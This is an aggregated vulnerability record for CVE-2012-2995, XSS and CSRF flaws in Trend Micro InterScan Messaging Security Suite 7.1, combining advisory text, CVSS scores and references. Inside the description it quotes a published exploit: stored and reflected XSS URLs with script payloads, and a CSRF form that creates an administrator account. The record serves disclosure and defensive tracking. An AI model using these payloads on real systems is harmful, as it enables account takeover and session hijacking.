ID

VAR-201209-0237


CVE

CVE-2012-2995


TITLE

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities

Trust: 0.8

sources: CERT/CC: VU#471364

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Trend Micro InterScan Messaging Security Suite 7.1-Build_Win32_1394 allow remote attackers to inject arbitrary web script or HTML via (1) the wrsApprovedURL parameter to addRuleAttrWrsApproveUrl.imss or (2) the src parameter to initUpdSchPage.imss. A cross-site scripting vulnerability. 2. An HTML-injection vulnerability. 3. A cross-site request-forgery vulnerability. An attacker can exploit these issues to steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session, or to disclose sensitive-information. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Trend Micro InterScan Messaging Security Suite Cross-Site Scripting and Request Forgery SECUNIA ADVISORY ID: SA50620 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/50620/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=50620 RELEASE DATE: 2012-09-17 DISCUSS ADVISORY: http://secunia.com/advisories/50620/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/50620/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=50620 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Trend Micro InterScan Messaging Security Suite, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks. 1) The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create an arbitrary user with administrative privileges if a logged-in administrative user visits a malicious web site 2) Input passed to the "src" parameter in initUpdSchPage.imss is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in version 7.1-Build_Win32_1394. Other versions may also be affected. SOLUTION: No official solution is currently available. PROVIDED AND/OR DISCOVERED BY: US-CERT credits Tom Gregory. ORIGINAL ADVISORY: http://www.kb.cert.org/vuls/id/471364 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . # Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF # Date: 13/09/2012 # Exploit Author: modpr0be (modpr0be[at]spentera.com) # Vendor Homepage: http://www.trendmicro.com # Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip # Version: 7.1-Build_Win32_1394 # Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config) # CVE : CVE-2012-2995, CVE-2012-2996 # Software Description # TrendMicro Interscan Messaging Security is the industry’s most comprehensive # mail gateway security. Choose state-of-the-art software or a hybrid solution # with on-premise virtual appliance and optional cloud pre-filter that blocks # the vast majority of spam and malware outside your network. Plus our Data # Privacy and Encryption Module secure outbound data to ensure privacy and # regulatory compliance. # Proof of Concept # Persistent/Stored XSS # this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word # will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??) hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script> # Non-persistent/Reflected XSS # This is non-persistent XSS, you might lure target user to click this link :) hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script> # Cross-Site Request Forgery # This POC should be targeted to user with admin privilege # It will add admin user with user quorra, and password quorra.123 # Target victim must be authenticated when perform this POC <html> <body> <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST"> <input type="hidden" name="enabled" value="on" /> <input type="hidden" name="authMethod" value="1" /> <input type="hidden" name="name" value="quorra" /> <input type="hidden" name="password" value="quorra.123" /> <input type="hidden" name="confirmPwd" value="quorra.123" /> <input type="hidden" name="tabAction" value="saveAuth" /> <input type="hidden" name="gotoTab" value="saveAll" /> <input type="submit" value="CSRF" /> </form> </body> </html> # References # http://www.spentera.com/advisories/2012/SPN-05-2012.html # http://www.kb.cert.org/vuls/id/471364 # http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Trust: 2.79

sources: NVD: CVE-2012-2995 // CERT/CC: VU#471364 // JVNDB: JVNDB-2012-004435 // BID: 55542 // PACKETSTORM: 116624 // PACKETSTORM: 116566

AFFECTED PRODUCTS

vendor:trendmicromodel:interscan messaging security suitescope:eqversion:7.1

Trust: 1.6

vendor:trend micromodel: - scope: - version: -

Trust: 0.8

vendor:trend micromodel:interscan messaging security suitescope:eqversion:7.0 (linux version and solaris edition )

Trust: 0.8

vendor:trend micromodel:interscan messaging security suitescope:eqversion:7.1 (linux version and windows edition )

Trust: 0.8

vendor:trend micromodel:interscan messaging security virtual appliancescope:eqversion:7.0

Trust: 0.8

vendor:trend micromodel:interscan messaging security virtual appliancescope:eqversion:8.0

Trust: 0.8

vendor:trend micromodel:interscan messaging security virtual appliancescope:eqversion:8.2

Trust: 0.8

sources: CERT/CC: VU#471364 // JVNDB: JVNDB-2012-004435 // CNNVD: CNNVD-201209-364 // NVD: CVE-2012-2995

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2012-2995
value: MEDIUM

Trust: 1.8

CNNVD: CNNVD-201209-364
value: MEDIUM

Trust: 0.6

NVD: CVE-2012-2995
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

sources: JVNDB: JVNDB-2012-004435 // CNNVD: CNNVD-201209-364 // NVD: CVE-2012-2995

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2012-004435 // NVD: CVE-2012-2995

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201209-364

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 116624 // CNNVD: CNNVD-201209-364

CONFIGURATIONS

sources: NVD: CVE-2012-2995

PATCH

title:InterScan Messaging Securityurl:http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Trust: 0.8

title:CVE-2012-2995 クロスサイトスクリプティング(XSS)の脆弱性についてurl:http://esupport.trendmicro.co.jp/pages/jp-2081971.aspx

Trust: 0.8

sources: JVNDB: JVNDB-2012-004435

EXTERNAL IDS

db:CERT/CCid:VU#471364

Trust: 3.7

db:NVDid:CVE-2012-2995

Trust: 2.8

db:SECUNIAid:50620

Trust: 1.8

db:SECTRACKid:1027544

Trust: 1.0

db:JVNDBid:JVNDB-2012-004435

Trust: 0.8

db:CNNVDid:CNNVD-201209-364

Trust: 0.6

db:BIDid:55542

Trust: 0.3

db:PACKETSTORMid:116624

Trust: 0.1

db:PACKETSTORMid:116566

Trust: 0.1

sources: CERT/CC: VU#471364 // BID: 55542 // JVNDB: JVNDB-2012-004435 // PACKETSTORM: 116624 // PACKETSTORM: 116566 // CNNVD: CNNVD-201209-364 // NVD: CVE-2012-2995

REFERENCES

url:http://www.kb.cert.org/vuls/id/471364

Trust: 2.9

url:http://secunia.com/advisories/50620

Trust: 1.6

url:http://www.securitytracker.com/id?1027544

Trust: 1.0

url:http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Trust: 0.9

url:http://cwe.mitre.org/data/definitions/352.html

Trust: 0.8

url:http://cwe.mitre.org/data/definitions/79.html

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2995

Trust: 0.8

url:http://jvn.jp/cert/jvnvu471364/

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2995

Trust: 0.8

url:http://apac.trendmicro.com/apac/products/enterprise/interscan-messaging-security-suite/

Trust: 0.3

url:http://secunia.com/vulnerability_intelligence/

Trust: 0.1

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

Trust: 0.1

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.1

url:http://secunia.com/vulnerability_scanning/personal/

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/blog/325/

Trust: 0.1

url:http://secunia.com/advisories/50620/#comments

Trust: 0.1

url:http://secunia.com/advisories/50620/

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=50620

Trust: 0.1

url:http://www.trendmicro.com/ftp/products/interscan/imss_v7.1_win_1394.zip

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-2996

Trust: 0.1

url:http://www.spentera.com/advisories/2012/spn-05-2012.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-2995

Trust: 0.1

url:http://www.trendmicro.com

Trust: 0.1

sources: CERT/CC: VU#471364 // BID: 55542 // JVNDB: JVNDB-2012-004435 // PACKETSTORM: 116624 // PACKETSTORM: 116566 // CNNVD: CNNVD-201209-364 // NVD: CVE-2012-2995

CREDITS

Tom Gregory

Trust: 0.3

sources: BID: 55542

SOURCES

db:CERT/CCid:VU#471364
db:BIDid:55542
db:JVNDBid:JVNDB-2012-004435
db:PACKETSTORMid:116624
db:PACKETSTORMid:116566
db:CNNVDid:CNNVD-201209-364
db:NVDid:CVE-2012-2995

LAST UPDATE DATE

2022-05-04T08:58:04.503000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#471364date:2014-08-15T00:00:00
db:BIDid:55542date:2012-09-13T00:00:00
db:JVNDBid:JVNDB-2012-004435date:2012-10-01T00:00:00
db:CNNVDid:CNNVD-201209-364date:2012-09-19T00:00:00
db:NVDid:CVE-2012-2995date:2013-04-13T02:54:00

SOURCES RELEASE DATE

db:CERT/CCid:VU#471364date:2012-09-13T00:00:00
db:BIDid:55542date:2012-09-13T00:00:00
db:JVNDBid:JVNDB-2012-004435date:2012-09-19T00:00:00
db:PACKETSTORMid:116624date:2012-09-18T11:57:52
db:PACKETSTORMid:116566date:2012-09-15T00:19:52
db:CNNVDid:CNNVD-201209-364date:2012-09-19T00:00:00
db:NVDid:CVE-2012-2995date:2012-09-17T14:55:00